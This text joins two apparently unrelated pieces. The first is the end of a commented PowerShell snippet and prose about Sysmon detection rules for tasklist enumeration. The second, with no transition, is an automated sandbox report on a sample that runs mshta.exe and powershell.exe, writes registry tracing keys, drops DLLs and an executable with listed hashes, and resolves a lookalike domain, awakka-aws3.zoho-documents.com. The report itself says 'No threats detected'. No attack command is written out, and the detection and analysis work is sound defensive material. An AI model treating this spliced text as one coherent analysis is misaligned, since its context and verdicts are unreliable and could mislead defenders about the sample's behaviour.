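#   Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-Sysmon/Operational'; Id=1 } |
#     ForEach-Object { $x = [xml]$_.ToXml(); $d = @{}
#                      $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#                      [pscustomobject]$d } |
#     ForEach-Object { Invoke-ProcessRules -Events $_ -Rules $rules }
```

The control record exercises the false-positive path: tasklist from cmd.exe is routine administration, and it is only the /FI "IMAGENAME eq ..." filter piped into find, repeated from a parent in the user's temp directory, that marks the enumeration seen here. The first rule deliberately does not require the child to be powershell.exe, because ProxyCommand runs through the shell and the parent of the eventual PowerShell is cmd.exe or conhost.exe depending on how the endpoint sensor attributes console hosts.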
Total events: 21 407
Read events: 21 390
Write events: 17
Delete events: 0

Modification events

Process: (6056) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

Process: (6056) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

Process: (6056) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

Process: (4640) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

Process: (4640) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

Process: (4640) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

Process: (4640) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileTracingMask
Value:

Process: (4640) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

Process: (4640) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576

Process: (4640) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileDirectory
Value: %windir%\tracing
Executable files: 17
Suspicious files: 8
Text files: 10
Unknown types: 0

Dropped files

PID | Process | Filename | Type

2380 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ilqsib1u.2dt.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6056 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8 | binary
MD5: 971C514F84BBA0785F80AA1C23EDFD79
SHA256: F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895

6924 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pwtyu4iu.by1.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6056 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | binary
MD5: 67E486B2F148A3FCA863728242B6273E
SHA256: FACAF1C3A4BF232ABCE19A2D534E495B0D3ADC7DBE3797D336249AA6F70ADCFB

6704 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ujmyujlt.twj.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

6704 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s2lmk5uh.onj.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

7104 | S5XF7PFF0L5EBLJADOTQX9.exe | C:\Users\admin\AppData\Local\Temp\{0CE73DEB-3A6A-4C05-B6A5-18059F853E5F}\.ba\CrashRpt.dll | executable
MD5: AB1A78EA3C767A7419E18D0A8113AB40
SHA256: C04027BA0B872C906B9C910E27D7CE5AAB17C4D11F4B5330B32E9590723FF93D

4640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bbz4ulhx.kjh.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

4640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_50nonihz.p44.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

7104 | S5XF7PFF0L5EBLJADOTQX9.exe | C:\Users\admin\AppData\Local\Temp\{0CE73DEB-3A6A-4C05-B6A5-18059F853E5F}\.ba\Cockatoo.dll | executable
MD5: 0FFB11D4AF21F736AB72DCA83095A161
SHA256: 40F6A2921E7BAF7FD78B2738A4F17D863C6F3ABCAE22692CA27055AC67EAD794
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 11
TCP/UDP connections: 43
DNS requests: 22
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation (the Type and Size columns are empty for every row in the report)
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.38.73.129:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
1688 | svchost.exe | GET | 200 | 23.32.238.112:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.32.238.112:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
6056 | mshta.exe | GET | 200 | 142.250.185.67:80 | http://c.pki.goog/r/gsr1.crl | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
1688 | svchost.exe | GET | 200 | 23.38.73.129:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6056 | mshta.exe | GET | 200 | 142.250.185.67:80 | http://c.pki.goog/r/r4.crl | unknown | whitelisted
6376 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
- | - | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1688 | svchost.exe | 23.32.238.112:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 23.32.238.112:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5064 | SearchApp.exe | 2.19.80.27:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 23.38.73.129:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
1688 | svchost.exe | 23.38.73.129:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | unknown
1176 | svchost.exe | 40.126.32.134:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
www.bing.com
  • 2.19.80.27
  • 2.19.80.89
whitelisted
crl.microsoft.com
  • 23.32.238.112
  • 23.32.238.107
whitelisted
www.microsoft.com
  • 23.38.73.129
  • 95.101.149.131
whitelisted
google.com
  • 142.250.186.110
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.32.134
  • 20.190.160.22
  • 40.126.32.72
  • 40.126.32.68
  • 20.190.160.17
  • 20.190.160.20
  • 40.126.32.138
  • 40.126.32.140
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
awakka-aws3.zoho-documents.com
  • 172.67.129.82
  • 104.21.2.148
unknown
c.pki.goog
  • 142.250.185.67
whitelisted

Threats

No threats detected
No debug info